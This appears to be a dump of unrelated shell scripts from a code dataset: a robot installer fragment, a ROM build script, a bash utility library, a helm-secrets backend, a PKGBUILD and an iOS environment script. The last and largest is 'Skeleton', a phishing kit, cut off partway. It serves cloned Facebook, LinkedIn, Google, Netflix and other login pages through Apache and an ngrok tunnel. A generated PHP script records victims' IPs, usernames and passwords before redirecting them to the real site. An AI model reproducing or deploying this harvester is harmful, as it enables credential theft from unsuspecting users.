rsync ${rsyncOptions} -e "${sshCommand}" "${sysrootDir}"/* nao@${robotIp}:${copyTo}/sysroot/ || fatal "Can't copy to '${copyTo}' on NAO"
}
runInstallation() {
message "launching install process"
ssh -i "${privateKey}" ${sshOptions} nao@${robotIp} "chmod 755 ${copyTo}/install && bash -l -c '${copyTo}/install'" || fatal "Installation failed"
}
###############################################################################
## ##
## MAIN ##
## ##
###############################################################################
checkApp "rsync"
parseOptions "$@"
copyKey ${robotIp}
getNames
copyFiles
runInstallation
| true |
47a450f4024e8bd665df59c61e027024ddab8421 | Shell | vjspranav/RomBuildScript | /script_build.sh | UTF-8 | 4,649 | 3.71875 | 4 | [] | no_license | #!/bin/bash
# curl https://raw.githubusercontent.com/vjspranav/RomBuildScript/ryzen7/script_build.sh>script_build.sh
# Make necessary changes before executing script
# Export some variables
# make_clean (yes/no/installclean/deviceclean)
user=
lunch=
device_codename=avicii
build_type=userdebug
tg_username=
OUT_PATH="out/target/product/$device_codename"
use_ccache=yes
make_clean=no
stopped=0
finish=0
function finish {
stopped=1
rm -rf /tmp/manlocktest.lock;
read -r -d '' msg <<EOT
<b>Build Stopped</b>
<b>Device:-</b> ${device_codename}
<b>Started by:-</b> ${tg_username}
EOT
if [ $finish = 0 ] ; then
telegram-send --format html "$msg" --config /ryzen.conf
fi
}
function setVar {
hours=$((i/3600))
minutes=$(( $((i/60)) - $((hours*60))))
seconds=$(( i - $((hours*60*60)) - $((minutes*60))))
if [ $hours = 1 ]; then
h="Hour"
else
h="Hours"
fi
if [ $minutes = 1 ]; then
m="Minute"
else
m="Minutes"
fi
if [ $seconds = 1 ]; then
s="Second"
else
s="Seconds"
fi
}
i=0
echo -n "Test Line might be deleted"
while { set -C; ! 2>/dev/null > /tmp/manlocktest.lock; }; do
((i=i+1))
uname2=$(ls -l /tmp/manlocktest.lock | awk '{print $3}');
setVar
if [ $uname2 = $USER ]; then
echo -e "Warning you can't wait while you are building"
exit 1
elif [ $i -gt 3600 ]; then
hours=$((i/3600))
minutes=$(( $((i/60)) - $((hours*60))))
seconds=$(( i - $((hours*60*60)) - $((minutes*60))))
pr="$hours $h $minutes $m $seconds $s "
elif [ $i -lt 60 ]; then
pr="$i $s "
else
minutes=$((i/60))
seconds=$(( i - $((minutes*60))))
pr="$minutes $m $seconds $s "
fi
echo -n -e "\r${uname2} Building. Waiting for $pr"
sleep 10
done
trap finish EXIT SIGINT
echo -e "\rBuild starting thank you for waiting"
#Start Counting build time after build started we don't want wait time included
START=$(date +%s)
BUILDFILE="buildlog"_$START.txt
mkdir -p /home/${user}/downloads/buildlogs/
touch /home/${user}/downloads/buildlogs/${BUILDFILE}
BLINK="http://${user}.ryzenbox.me/buildlogs/${BUILDFILE}"
# Send message to TG
read -r -d '' msg <<EOT
<b>Build Started</b>
<b>Device:-</b> ${device_codename}
<b>Started by:-</b> ${tg_username}
<b>Console log:-</b> <a href="${BLINK}">here</a>
EOT
telegram-send --format html "$msg" --config /ryzen.conf
# Colors makes things beautiful
export TERM=xterm
red=$(tput setaf 1) # red
grn=$(tput setaf 2) # green
blu=$(tput setaf 4) # blue
cya=$(tput setaf 6) # cyan
txtrst=$(tput sgr0) # Reset
# Ccache
if [ "$use_ccache" = "yes" ];
then
echo -e ${blu}"CCACHE is enabled for this build"${txtrst}
export CCACHE_EXEC=$(which ccache)
export USE_CCACHE=1
export CCACHE_DIR=/home/$user/ccache
ccache -M 75G
fi
if [ "$use_ccache" = "clean" ];
then
export CCACHE_EXEC=$(which ccache)
export CCACHE_DIR=/home/$user/ccache
ccache -C
export USE_CCACHE=1
ccache -M 75G
wait
echo -e ${grn}"CCACHE Cleared"${txtrst};
fi
rm -rf ${OUT_PATH}/*.zip #clean rom zip in any case
# Time to build
source build/envsetup.sh
lunch "$lunch"_"$device_codename"-"$build_type"
# Clean build
if [ "$make_clean" = "yes" ];
then
make clean && make clobber
wait
echo -e ${cya}"OUT dir from your repo deleted"${txtrst};
fi
if [ "$make_clean" = "installclean" ];
then
make installclean
rm -rf ${OUT_PATH}/${ROM_ZIP}
wait
echo -e ${cya}"Images deleted from OUT dir"${txtrst};
fi
if [ "$make_clean" = "deviceclean" ];
then
make deviceclean
rm -rf ${OUT_PATH}/${ROM_ZIP}
wait
echo -e ${cya}"Device dir deleted from OUT dir"${txtrst};
fi
make bacon -j16 |& tee "/home/${user}/downloads/buildlogs/${BUILDFILE}"
END=$(date +%s)
TIME=$(echo $((${END}-${START})) | awk '{print int($1/60)" Minutes and "int($1%60)" Seconds"}')
ROM=${OUT_PATH}/StagOS*.zip
if [ -f $ROM ]; then
cp $ROM /home/${user}/downloads/
filename="$(basename $ROM)"
LINK="http://${user}.ryzenbox.me/${filename}"
read -r -d '' suc <<EOT
<b>Build Finished</b>
<b>Time:-</b> ${TIME}
<b>Device:-</b> ${device_codename}
<b>Started by:-</b> ${tg_username}
<b>Download:-</b> <a href="${LINK}">here</a>
EOT
else
# Send message to TG
cp out/error.log /home/${user}/downloads/error.txt
read -r -d '' suc <<EOT
<b>Build Errored</b>
<b>Time:-</b> ${TIME}
<b>Device:-</b> ${device_codename}
<b>Started by:-</b> ${tg_username}
<b>Check error:-</b> <a href="http://${user}.ryzenbox.me/error.txt">here</a>
EOT
fi
if [ $stopped = 0 ] ; then
telegram-send --format html "$suc" --config /ryzen.conf
fi
finish=1
| true |
8f43b5f82f82a0ba3681975e9d55df343111f715 | Shell | drmingdrmer/homefolder | /xp/bash-d/sbin/util.sh | UTF-8 | 4,225 | 3.59375 | 4 | [] | no_license | #!/bin/sh
LOG_FILE=${LOG_FILE-/dev/null}
# color definitions {{{
Black="$(tput -T linux setaf 0)"
BlackBG="$(tput -T linux setab 0)"
DarkGrey="$(tput -T linux bold ; tput -T linux setaf 0)"
LightGrey="$(tput -T linux setaf 7)"
LightGreyBG="$(tput -T linux setab 7)"
White="$(tput -T linux bold ; tput -T linux setaf 7)"
Red="$(tput -T linux setaf 1)"
RedBG="$(tput -T linux setab 1)"
LightRed="$(tput -T linux bold ; tput -T linux setaf 1)"
Green="$(tput -T linux setaf 2)"
GreenBG="$(tput -T linux setab 2)"
LightGreen="$(tput -T linux bold ; tput -T linux setaf 2)"
Brown="$(tput -T linux setaf 3)"
BrownBG="$(tput -T linux setab 3)"
Yellow="$(tput -T linux bold ; tput -T linux setaf 3)"
Blue="$(tput -T linux setaf 4)"
BlueBG="$(tput -T linux setab 4)"
LightBlue="$(tput -T linux bold ; tput -T linux setaf 4)"
Purple="$(tput -T linux setaf 5)"
PurpleBG="$(tput -T linux setab 5)"
Pink="$(tput -T linux bold ; tput -T linux setaf 5)"
Cyan="$(tput -T linux setaf 6)"
CyanBG="$(tput -T linux setab 6)"
LightCyan="$(tput -T linux bold ; tput -T linux setaf 6)"
NC="$(tput -T linux sgr0)" # No Color
# }}}
err()
{ #{{{
local msg="$LightRed[ ERROR ]$NC $@"
echo "$msg"
local msg="[`/bin/date +"%F %T"`][ ERROR ] $@"
echo "$msg" >> ${LOG_FILE}
} #}}}
ok()
{ #{{{
local msg="${LightGreen}[ OK ]$NC $@"
echo "$msg"
local msg="[`/bin/date +"%F %T"`][ OK ] $@"
echo "$msg" >> ${LOG_FILE}
} #}}}
info()
{ #{{{
local msg="$Yellow[ INFO ]$NC $@"
echo "$msg"
local msg="[`/bin/date +"%F %T"`][ INFO ] $@"
echo "$msg" >> ${LOG_FILE}
} #}}}
has_command()
{ #{{{
which $1 2>/dev/null 1>/dev/null
} #}}}
date_epoch()
{ #{{{
# date format must be "yyyy-mm-dd[ HH[:MM]]"
date +%s -d "$1"
} #}}}
rand()
{ #{{{
local ndig=${1-4}
date +%N | cut -c 0-$ndig
} #}}}
local_ip()
{ #{{{
local tp=${1-ex}
if [ "$tp" == "ex" ]; then
/sbin/ifconfig | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}' | grep -v "^172\.\|^10\."
else
/sbin/ifconfig | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}' | grep "^172\.\|^10\."
fi
} #}}}
__cmds_on_exit__=""
on_exit()
{ #{{{
# "trap" overrides commands previously set. This is why on_exit here
local cmd=$*
if [ "x$__cmds_on_exit__" == "x" ];then
__cmds_on_exit__=$cmd
else
__cmds_on_exit__="$__cmds_on_exit__; $cmd"
fi
trap "$__cmds_on_exit__" 0 2 3 15
} #}}}
single_proc()
{ #{{{
local lockName=$1
local lockFile=/tmp/$lockName
if mkdir $lockFile; then
on_exit "rm -rf $lockFile"
return 0
else
echo `date +"%F %T"` " Another Process is ruuning, exit" >&2
exit
fi
} #}}}
save_tmp()
{ #{{{
local fn=$1
echo -en "" > $fn
while shift; do
echo "$1" >> $fn
done
} #}}}
load_tmp()
{ #{{{
local fn=$1
if [ -f $fn ]; then
. $fn
return 0
else
return 1
fi
} #}}}
exit_if_inexist()
{ #{{{
if [ -f $1 ]; then
ok "Exist: $1"
else
err "Exit because no such file: $1"
exit 1
fi
} #}}}
load_scanning_st()
{ #{{{
# output is 3 global variables:
# _inode # indoe of the $statsFn
# _offset # offset where last read ends
local statsFn=$1
local logfn=$2
local statsFolder=${statsFn%/*}
exit_if_inexist $logfn
mkdir -p "$statsFolder"
currentInode=`stat -c %i $logfn`
currentSize=`stat -c %s $logfn`
_sizeReadTmpFN=/tmp/`rand 4`
_inode=0
_offset=0
load_tmp $statsFn
if [ "$_inode" != "$currentInode" ]; then
_inode=$currentInode
_offset=0
fi
if [ "$_offset" -gt "$currentSize" ];then
_offset=0
fi
# auto save and cleanup
on_exit "save_scanning_st $statsFn"
} #}}}
save_scanning_st()
{ #{{{
local statsFn=$1
local statsFolder=${statsFn%/*}
dumpSize=`cat $_sizeReadTmpFN`
let _offset=_offset+dumpSize
save_tmp $statsFn "_inode=$_inode" "_offset=$_offset"
rm -rf $_sizeReadTmpFN
} #}}}
svn_rev()
{ #{{{
local dir=$1
svn info $dir | grep -v "^$" | tail -n2 |head -n1 | awk '{print $NF}'
} #}}}
| true |
3e0987135bc9492afc97d5f0d119986bad0dde68 | Shell | jkroepke/helm-secrets | /examples/backends/envsubst.sh | UTF-8 | 869 | 3.875 | 4 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env sh
if [ "${QUIET}" = "false" ]; then
log 'DEPRECATED: Envsubst backend is going to be remove in the next major version. Use vals backend instead.'
fi
_envsubst() {
# shellcheck disable=SC2086
set -- ${SECRET_BACKEND_ARGS} "$@"
envsubst "$@"
}
_custom_backend_is_file_encrypted() {
input="${1}"
grep -q '\$' "${input}"
}
_custom_backend_encrypt_file() {
echo "Encrypting files with envsubst backend is not supported!"
exit 1
}
_custom_backend_decrypt_file() {
# shellcheck disable=SC2034
type="${1}"
input="${2}"
# if omit then output to stdout
output="${3:-}"
if [ "${output}" != "" ]; then
_envsubst <"${input}" >"${output}"
else
_envsubst <"${input}"
fi
}
_custom_backend_edit_file() {
echo "Editing files with envsubst backend is not supported!"
exit 1
}
| true |
94230fc04d10a563cc03ab548398115e58b78cc5 | Shell | ODEX-TOS/packages | /tidy/trunk/PKGBUILD | UTF-8 | 1,164 | 2.875 | 3 | [
"GPL-1.0-or-later",
"MIT"
] | permissive | # Maintainer:
# Contributor: eric <eric@archlinux.org>
# Contributor: Markus Meissner <markus@meissna.de>
pkgname=tidy
pkgver=5.7.16
_commit=5f7e367cb54563dabda4bf4e3c11c6ecc68a0fa3
pkgrel=2
pkgdesc="A tool to tidy down your HTML code to a clean style"
arch=(x86_64)
url="https://www.html-tidy.org/"
license=(custom)
depends=(glibc)
makedepends=(cmake libxslt)
conflicts=(tidyhtml)
provides=(tidyhtml)
replaces=(tidyhtml)
source=("$pkgname-$_commit.tar.gz::https://github.com/htacg/tidy-html5/archive/$_commit.tar.gz")
sha512sums=('2854f81a4dcc5f0a995360b85a6169a4320a823e1982c12fba5fbe5d10afca442719e8a4ed719d038e7cf723a43523dc4294b2c751a29a8dfd5f471d96079767')
prepare() {
mv tidy-html5-{$_commit,$pkgver}
mkdir -p build
}
build() {
cd build
cmake ../tidy-html5-$pkgver \
-DCMAKE_INSTALL_PREFIX=/usr \
-DCMAKE_BUILD_TYPE=Release
make
}
package() {
cd build
make DESTDIR="$pkgdir" install
# Compatibility symlinks until everything is ported
ln -s tidybuffio.h "$pkgdir"/usr/include/buffio.h
ln -s tidyplatform.h "$pkgdir"/usr/include/platform.h
install -Dm644 "$srcdir"/$pkgname-html5-$pkgver/README/LICENSE.md "$pkgdir"/usr/share/licenses/$pkgname/LICENSE
}
| true |
a68f0bca08ba950cdabeacdc83821840455636f9 | Shell | bauglir/castle-base | /home/local/bin/execute-with-envfile | UTF-8 | 161 | 3.59375 | 4 | [] | no_license | #!/usr/bin/env sh
ENV_FILE=$1
if [ -e $ENV_FILE ]; then
shift
eval $(cat "$ENV_FILE") "$@"
else
echo "Unknown environment file '$ENV_FILE' specified"
fi
| true |
55fecefd7174685163f66022e310c3bea54060dc | Shell | DataTransparency/Podaon | /scripts/environment-variables.sh | UTF-8 | 5,165 | 2.953125 | 3 | [] | no_license | #!/bin/sh -xe
: "${ENVIRONMENT:?There must be a ENVIRONMENT environment variable set}"
: "${LOCATION:?There must be a LOCATION environment variable set}"
export TEAMID=TQYB6VJLUN
export PROVIDER=JamesWOOD1426797195
export GITHUB_REPO=classfitter
export GITHUB_OWNER=classfitter
export PRODUCT_NAME=Podaon
export PRODUCT_NAME_LOWER=podaon
export BUILD_SCHEME="ClassfitteriOS"
export UI_TEST_SCHEME="UITests"
export UNIT_TEST_SCHEME="UnitTests"
if [[ $LOCATION == "CI" ]]; then
export NODE_ENV=production
export PATH=/Users/buildservice/.rvm/gems/ruby-2.3.0/bin:/Users/buildservice/.rvm/gems/ruby-2.3.0@global/bin:/Users/buildservice/.rvm/rubies/ruby-2.3.0/bin:/Users/buildservice/.rvm/bin:/Users/buildservice/.nvm/versions/node/v6.5.0/bin:/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/opt/X11/bin:/usr/local/go/bin
else
export WORKSPACE=$PWD
export NODE_ENV=development
export BUILD_URL=http://www.fakeurl.com
export BUILD_NUMBER=0
export GIT_COMMIT=efdbd257dd5aa178ebcdfc265db22997d781654e
fi
: "${WORKSPACE:?There must be a WORKSPACE environment variable set}"
echo "The WORKSPACE is ${WORKSPACE}"
export BIN_DIRECTORY="${WORKSPACE}/bin/${ENVIRONMENT}"
export ENVIRONMENT_DIRECTORY="${WORKSPACE}/env/${ENVIRONMENT}"
export XCODE_WORKSPACE_DIRECTORY_NAME="ClassfitteriOS"
export XCODE_WORKSPACE_DIRECTORY="${ENVIRONMENT_DIRECTORY}/${XCODE_WORKSPACE_DIRECTORY_NAME}"
export IOS_APP_DIRECTORY_NAME="ClassfitteriOS"
export IOS_APP_DIRECTORY="${XCODE_WORKSPACE_DIRECTORY}/${IOS_APP_DIRECTORY_NAME}"
export XCODE_WORKSPACE_FILE="${XCODE_WORKSPACE_DIRECTORY}/ClassfitteriOS.xcworkspace"
export XCODE_PROJECT_FILE="${XCODE_WORKSPACE_DIRECTORY}/ClassfitteriOS.xcodeproj"
export XCODE_PROJECT_FILE_PBXPROJ="${XCODE_PROJECT_FILE}/project.pbxproj"
if [[ ${ENVIRONMENT} == 'production' ]]; then
DISPLAY_NAME="${PRODUCT_NAME}"
else
DISPLAY_NAME="$(tr '[:lower:]' '[:upper:]' <<< ${ENVIRONMENT:0:1})${ENVIRONMENT:1}"
fi
export DISPLAY_NAME
export FIREBASE_DIRECTORY_NAME=Firebase
export FIREBASE_SERVICE_FILE=${XCODE_WORKSPACE_DIRECTORY}/FirebaseServiceAccount.json
export FIREBASE_ANALYTICS_FILE=${XCODE_WORKSPACE_DIRECTORY}/GoogleService-Info.plist
export FIREBASE_SYMBOL_SERVICE_JSON=~/${FIREBASE_DIRECTORY_NAME}/FirebaseServiceAccount-${ENVIRONMENT}.json
export FIREBASE_ANALYTICS_PLIST=~/${FIREBASE_DIRECTORY_NAME}/GoogleService-Info-${ENVIRONMENT}.plist
export VERSION_FILE="${BIN_DIRECTORY}/version.txt"
export FULL_VERSION_FILE="${BIN_DIRECTORY}/fullversion.txt"
if [[ ${LOCATION} == 'CI' ]] && [[ ${COMMAND} == 'deploy' ]] && [[ ${ENVIRONMENT} == 'production' ]]; then
echo "Using payload from GitHub"
: "${payload:?There must be a payload environment variable set}"
else
echo "Using dev payload"
export payload=`cat ${WORKSPACE}/scripts/deploymentPayload.json`
fi
export PAYLOAD_FILE="${BIN_DIRECTORY}/payload.json"
export GITHUB_STATUS_NAME="${COMMAND}_${ENVIRONMENT}"
export STATUS_FILE="${BIN_DIRECTORY}/status.txt"
export BUNDLE_IDENTIFIER_BASE="com.podaon.ios"
export BUNDLE_IDENTIFIER="${BUNDLE_IDENTIFIER_BASE}-${ENVIRONMENT}"
export VENDOR_ID=${BUNDLE_IDENTIFIER}
if [[ ${COMMAND} == 'deploy' ]] || [[ ${COMMAND} == 'export' ]] || [[ ${COMMAND} == 'archive' ]] || [[ ${COMMAND} == 'build' ]]; then
export COMPILE_TYPE=release
else
export COMPILE_TYPE=debug
fi
export PROVISIONING_PROFILE_NAME="${ENVIRONMENT}-${COMPILE_TYPE}"
echo "The BUNDLE_IDENTIFIER AND VENDOR_ID are ${BUNDLE_IDENTIFIER}"
echo "The PROVISIONING_PROFILE_NAME is ${PROVISIONING_PROFILE_NAME}"
if [[ ${ENVIRONMENT} == 'production' ]]; then
export APPLEID=1159838083
export GOOGLE_APP_ID=1:785675090007:ios:3cd6ed1bd536e6dd
fi
if [[ ${ENVIRONMENT} == 'beta' ]]; then
export APPLEID=1159838089
export GOOGLE_APP_ID=1:785675090007:ios:ee7283f955dd5540
fi
if [[ ${ENVIRONMENT} == 'development' ]]; then
export APPLEID=1159838102
export GOOGLE_APP_ID=1:142144125321:ios:d2cea722aa24f417
fi
if [[ ${ENVIRONMENT} == 'test' ]]; then
export APPLEID=1159838093
export GOOGLE_APP_ID=1:1071308776983:ios:01c2ebec2e00b55b
fi
export ARCHIVE_DIR="${BIN_DIRECTORY}/archive"
export ARCHIVE_FILE_NAME="ClassfitteriOS"
export EXPORT_DIR="${BIN_DIRECTORY}/export"
export EXPORT_CHECK_DIR="${BIN_DIRECTORY}/export_check"
export UPLOAD_DIR="${BIN_DIRECTORY}/upload"
export ITSMP_FILE=${UPLOAD_DIR}/mybundle.itmsp
export UPLOAD_CHECK_DIR="${BIN_DIRECTORY}/upload_check"
export COVERAGE_DIR="${BIN_DIRECTORY}/coverage"
export UNIT_TEST_RESULTS_FOLDER="${BIN_DIRECTORY}/test-unit-results"
export UI_TEST_RESULTS_FOLDER="${BIN_DIRECTORY}/test-ui-results"
export TEST_RESULTS_FILE="${BIN_DIRECTORY}/results.xml"
export OCUNIT2JUNIT_FOLDER="${WORKSPACE}/test-reports"
if [[ ${LOCATION} == 'CI' ]]; then
if [[ ${COMMAND} == 'test-ui' ]]; then
DESTINATION="platform=iOS Simulator,name=iPhone SE,OS=10.0"
else
DESTINATION="platform=iOS Simulator,name=iPhone 6,OS=10.0"
fi
else
if [[ ${COMMAND} == 'test-ui' ]]; then
DESTINATION="platform=iOS Simulator,name=iPhone 6s,OS=10.0"
else
DESTINATION="platform=iOS Simulator,name=iPhone 5,OS=10.0"
fi
fi
export DESTINATION
| true |
eb22d49baacabf469d576287bb4685b99f3dd05d | Shell | shadowofthedusk/Skeleton | /skeleton.sh | UTF-8 | 13,830 | 3.125 | 3 | [] | no_license | #!/bin/bash
# _______ __ __ __
# | _ | |--.-----| .-----| |_.-----.-----.
# | 1___| <| -__| | -__| _| _ | |
# |____ |__|__|_____|__|_____|____|_____|__|__|
# |: 1 |
# |_______|
#**** INFO ****
#
# Skeleton is a Social Engineering tool attack switcher
# Type: Phishing Tool
#
# Target: Facebook, Linkedin, Twitter, Pinterest, Google, Instagram, Microsoft, Netflix
#
# DISCLAMER: Program for educational purposes!!!
#
#**********************
#
# Name: Skeleton
# Version: 1.0 beta
# Dev: Shell
# Language: En
# Date: 08/14/2017
# Author: KURO-CODE
#
#**********************
#**********************
#
# Name: Skeleton
# Version: 1.1
# Dev: Shell
# Language: En
# Date: 03/28/2018
# Author: KURO-CODE
#
# -Attack Switcher BugFix
# -Exit (Revision)
# -BugFix
# -Check ROOT perm...
#
#**********************
#**********************
#
# Name: Skeleton
# Version: 1.2
# Dev: Shell
# Language: En
# Date: 10/28/2018
# Author: KURO-CODE
#
# + BugFix
#
# ~~~ Sites ~~~
#
# + Google
# + Instagram
# + Microsoft
# + Netflix
#
#**********************
#**** Skeleton version ****
VERSION="1.2"
#**** Screen size ****
resize -s 20 61 > /dev/null
#**** Check Root ****
function check_root_perm() {
clear
FLAG
user=$(whoami)
if [ "$user" = "root" ]; then
echo -e "
$W [$G""X$W]$GR...$G""Y$W""ou are $G""Root$W!"
sleep 1.2
RUN
else
echo -e "
$W [$R""X$W]$GR...$R""Y$W""ou are not $R""Root$W!
$G""U$W""se:$Y sudo ./skeleton.sh$EC"
sleep 1
echo -e "
$W [$R""X$W]$GR...$R""C$W""lose"
sleep 1
fi
}
#**** CONFIG ****
IMG_PATH="img"
TMP="/var/www/html"
SITE="site/$site/$lang/index.html"
SYSTM32="ngrok"
SYSTEM64="ngrok_64"
SKELEDIAL=" SkEleToN~OpTioN: "
#**** Color ****
CL="\033[0;7m"
W="\033[1;37m"
GR="\033[0;37m"
R="\033[1;31m"
G="\033[1;32m"
Y="\033[1;33m"
B="\033[1;34m"
M="\033[1;35m"
EC="\033[0m"
#**** Display ****
DISPLAY_LOG="-geometry 40x5+800+0"
DISPLAY_SERV="-geometry 80x10+600-300"
DISPLAY_KEY="-geometry 100x21+600-0"
#**** TOP MENU SELECT ****
MENU_main="$W~ Main Menu ~$EC"
MENU_info="$W~ I N F O ~"
MENU_skel="$W~ Skeleton menu ~"
MENU_skel1="$B""S$W""E$GR""le$W""CT"
MENU_skel2="Select an attack"
#~~~ START ~~~
function RUN {
Place="Run"
clear
FLAG
sleep 1
echo -e "\n $B ***********************************
*$B A$W automatic$M phishing$R server$B *
*$W By$B K$W""U$B""R$W""O-$B""C$W""O$B""D$B""E$G &$M Z$W""0$W""m$M""B$W""13$M""D$W""o$M""LL$G 2$W""0$R""17$B *
***********************************$EC
"
sleep 3
main
}
function main {
Place="MAIN"
clear
FLAG
echo
echo -e "\n $MENU_main
$B""o$W-----------------$B""o$W
| 1$W)$GR...$B""I$GR""n$W""f$GR""o$W |
| 2$W)$GR...$B""S$W""k$GR""e$W""le$GR""to$W""n |
|$R 0$W)$GR...$R""Exit$W |
$B""o$W-----------------$B""o$EC
"
read -p "$SKELEDIAL" opt
case $opt in
1) inf;;
2) select_attack;;
0) EXITMODE;;
*) echo -e "$CL$R[ERROR]$EC"; sleep 2; main;;
esac
}
#~~~~ Attack Selection ~~~~
function select_attack {
place="Sel_Attack"
clear
FLAG
echo
echo -e " ~ $W$MENU_skel2 ~
$B""o$W--------------------------------$B""o$W
| $W""1)$GR...$B""F$W""acebook 2)$GR...$B""L$W""inkedin |
| |
| $W""3)$GR...$B""T$W""witter 4)$GR...$B""P$W""interest |
| |
| $W""5)$GR...$B""G$W""oogle 6)$GR...$B""I$W""nstagram |
| |
| $W""7)$GR...$B""M$W""icrosoft 8)$GR...$B""N$W""etflix |
| |
| $R""0$W)$GR...$R""Exit $Y""9$W)$GR...$Y""Back$W |
$B""o$W--------------------------------$B""o$EC
"
read -p "$SKELEDIAL" site
case $site in
1)
site="facebook"
if [ ! -d "sites/facebook" ]; then
echo -e " $W[$Y!$W]$GR...$R""N$W""ot Exist$EC"
sleep 2
select_attack
else
lang
fi ;;
2)
site="linkedin"
if [ ! -d "sites/linkedin" ]; then
echo -e " $W[$Y!$W]$GR...$R""N$W""ot Exist$EC"
sleep 2
select_attack
else
lang
fi ;;
3)
site="twitter"
if [ ! -d "sites/twitter" ]; then
echo -e " $W[$Y!$W]$GR...$R""N$W""ot Exist$EC"
sleep 2
select_attack
else
lang
fi ;;
4)
site="pinterest"
if [ ! -d "sites/pinterest" ]; then
echo -e " $W[$Y!$W]$GR...$R""N$W""ot Exist$EC"
sleep 2
select_attack
else
lang
fi ;;
5)
site="google"
if [ ! -d "sites/google" ]; then
echo -e " $W[$Y!$W]$GR...$R""N$W""ot Exist$EC"
sleep 2
select_attack
else
lang
fi ;;
6)
site="instagram"
if [ ! -d "sites/instagram" ]; then
echo -e " $W[$Y!$W]$GR...$R""N$W""ot Exist$EC"
sleep 2
select_attack
else
lang
fi ;;
7)
site="microsoft"
if [ ! -d "sites/microsoft" ]; then
echo -e " $W[$Y!$W]$GR...$R""N$W""ot Exist$EC"
sleep 2
select_attack
else
lang
fi ;;
8)
site="netflix"
if [ ! -d "sites/netflix" ]; then
echo -e " $W[$Y!$W]$GR...$R""N$W""ot Exist$EC"
sleep 2
select_attack
else
lang
fi ;;
9) echo -e " [*]...Back" ; main ;;
0) EXITMODE ;;
*) echo -e "$CL$R[ERROR]$EC"; sleep 3; select_attack ;;
esac
}
#~~~~ Attack Language ~~~~
function lang {
Place="Lang"
clear
FLAG
echo -e "\n ~ Select language attack ~
$B""o$W-----------------$B""o$W
| 1$W)$GR...$G""English$W |
| 2$W)$GR...$G""French$W |
|$R 9$W)$GR...$R""Back$W |
$B""o$W-----------------$B""o$EC
"
read -p "$SKELEDIAL" opt_lang
case $opt_lang in
1)
SLang="en"
if [ ! -d "sites/$site/$SLang" ]; then
echo -e " $W[$Y!$W]$GR...$R""N$W""ot Exist$EC"
echo -e "$site"
sleep 2
select_attack
else
clear
FLAG
echo -e "\n $W[$G*$W]$GR...$G$site$W"
sleep 0.5
echo -e " $W[$B""E$W""n]$GR...$B""E$W""nglish selected"
sleep 0.5
echo -e " [$G*$W]$GR...$Y""Copy files$EC"
CopyFiles
Script
sleep 3
set_serv
fi ;;
2)
SLang="fr"
if [ ! -d "sites/$site/$SLang" ]; then
echo -e " $W[$Y!$W]$GR...$R""N$W""ot Exist$EC"
echo -e "$site"
sleep 2
select_attack
else
clear
FLAG
echo -e "\n $W[$G*$W]$GR...$G$site$W"
sleep 0.5
echo -e " $W[$B""F$W""R]$GR...$B""F$W""rench selected"
sleep 0.5
echo -e " [$G*$W]$GR...$Y""Copy files$EC"
CopyFiles
Script
sleep 3
set_serv
fi ;;
9) echo -e "$W[$R*$W]$GR...$W""Back" ; sleep 2 ; main ;;
*) echo -e "$CL$R[ERROR]$EC"; sleep 3; lang ;;
esac
}
#~~~~ Script ~~~~
function Script() {
echo "<?php
if (!empty(\$_SERVER['HTTP_CLIENT_IP']))
{
\$ipaddress = \$_SERVER['HTTP_CLIENT_IP'].\"\\r\\n\";
}
elseif (!empty(\$_SERVER['HTTP_X_FORWARDED_FOR']))
{
\$ipaddress = \$_SERVER['HTTP_X_FORWARDED_FOR'].\"\\r\\n\";
}
else
{
\$ipaddress = \$_SERVER['REMOTE_ADDR'].\"\\r\\n\";
}
\$useragent = \"User-Agent: \";
\$Username = \"Username: \";
\$PassWord = \"Password: \";
\$browser = \$_SERVER['HTTP_USER_AGENT'].\"\\r\\n\";
\$user = \$_POST['username'].\"\\r\\n\";
\$pass = \$_POST['password'].\"\\r\\n\";
\$CUT = \"-------------------------------\";
\$file = 'id.txt';
\$victim = \"\r\nIP: \";
\$fp = fopen(\$file, 'a');
fwrite(\$fp, \$victim);
fwrite(\$fp, \$ipaddress);
fwrite(\$fp, \$useragent);
fwrite(\$fp, \$browser);
fwrite(\$fp, \$Username);
fwrite(\$fp, \$user);
fwrite(\$fp, \$PassWord);
fwrite(\$fp, \$pass);
fwrite(\$fp, \$CUT);
fclose(\$fp);
header('Location: https://$site.com/');
exit();
" > $TMP/login.php
echo "<?php
include 'id.php';
header('Location: index.html');
exit
?> " > $TMP/index.php
}
#~~~~ Copy Files ~~~~
function CopyFiles() {
cp -r sites/$site/$SLang/* $TMP/
}
#~~~~ Set Server ~~~~
function set_serv {
Place="Set_Serv"
echo "#!/bin/bash
function rep {
clear
echo -e \"
$W~ Key ~$EC
\"
sleep 1
for i in \"$TMP/id.txt\"
do
echo -e \"****************
$site
****************\"
cat $TMP/id.txt
done
sleep 3
rep
}
rep" > key.sh
chmod +x key.sh
chmod 777 /var/www/html
service apache2 start
sleep 1
clear
FLAG
echo -e "
$W~ S$GR""e$W""T sE$GR""r$W""Ve$GR""r$W ~
$B""o$W------------$B""o$W
|$B 1$W)$GR...$B""3$W""2B$GR""it$W |
|$M 2$W)$GR...$M""6$W""4b$GR""i$W""T |
|$Y 3$W)$GR...$G""N$W""E$GR""x$W""T |
$B""o$W------------$B""o$W
[$Y""i$W] Server is active? Yes do \"next\" or select your system [$Y""i$W]
"
read -p "$SKELEDIAL" setserv
xterm -title "Skeleton Control" $DISPLAY_LOG -bg "#000000" -fg "#11ff00" -e "tail -f $TMP/id.txt > sk_tmp.csv" &
xterm -title "Skeleton" $DISPLAY_KEY -e "./key.sh" &
if [ "$setserv" -eq "1" ]; then
Sys="$SYSTM32"
echo -e "$W[$R+$W] Start service 32bit..."
sleep 2
chmod +x $SYSTM32
xterm -title "Skeleton Server Log" $DISPLAY_SERV -e ./$SYSTM32 http 80 &
sleep 2
control
elif [ "$setserv" -eq "2" ]; then
Sys="$SYSTEM64"
echo -e "$W[$R+$W] Start service 64bit..."
sleep 2
chmod +x $SYSTEM64
xterm -title "Skeleton Server Log" $DISPLAY_SERV -e ./$SYSTEM64 http 80 &
sleep 2
control
xterm -title "Skeleton Key" $DISPLAY_KEY -e "./key.sh" &
set_serv
elif [ "$setserv" -eq "3" ]; then
control
else
echo -e "$CL$R[ERROR]$EC"
sleep 2
set_serv
fi
}
#~~~~ Control Menu ~~~~
function control {
Place="Control"
clear
